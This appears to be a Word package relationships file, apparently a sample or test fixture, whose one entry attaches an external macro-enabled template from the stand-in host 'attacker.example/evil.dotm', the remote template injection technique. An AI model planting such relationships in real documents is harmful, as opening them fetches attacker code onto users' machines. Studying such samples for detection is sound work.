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<?xml version="1.0" encoding="UTF-8" standalone="yes"?><q:Relationships xmlns:q="http://schemas.openxmlformats.org/package/2006/relationships"><q:Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://attacker.example/evil.dotm" TargetMode="External"/></q:Relationships>
</file>